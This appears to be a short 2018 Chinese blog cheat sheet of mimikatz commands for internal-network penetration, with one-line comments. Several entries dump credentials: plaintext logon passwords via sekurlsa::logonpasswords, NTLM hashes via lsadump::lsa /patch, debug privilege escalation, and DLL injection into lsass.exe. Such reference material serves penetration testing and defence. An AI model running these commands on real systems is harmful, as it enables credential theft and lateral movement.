mimikatz内网渗透

learn

Word count: 315Reading time: 1 min

 2018/06/14 

mimikatz常用命令
使用：

mimikatz常用命令

system::user        //查看当前登录的用户
process::list       //列出进程
process::stop processname //结束进程（有些进程结束不了，即使权限够大）
process::suspend  processname //暂停进程
process::modules      //列出系统核心模块和其所在的物理路径
service::list       //列出系统服务
service::stop(start) service_name   //停止（开启）服务
privilege::list   //列出系统权限列表
privilege::debug   /提升权限 （执行这条命令得有足够的权限）
nogpo::cmd       //打开cmd
nogpo::regedit   //打开注册表
ts::sessions     //显示当前回话
ts::processes    //显示当前进程及其PID
sekurlsa::logonpasswords   //获取当前在线用户的明文密码（需要高权限运行）
lsadump::lsa /patch       //获取当前此计算机存在过用户的NTLMHASH
inject::process lsass.exe '路径' sekurlsa.dll //进程注入（如果用1.0版本获取hash的时候发现sekurlsa模块存在，就可以用进程注入一个dll文件，然后在获取hash）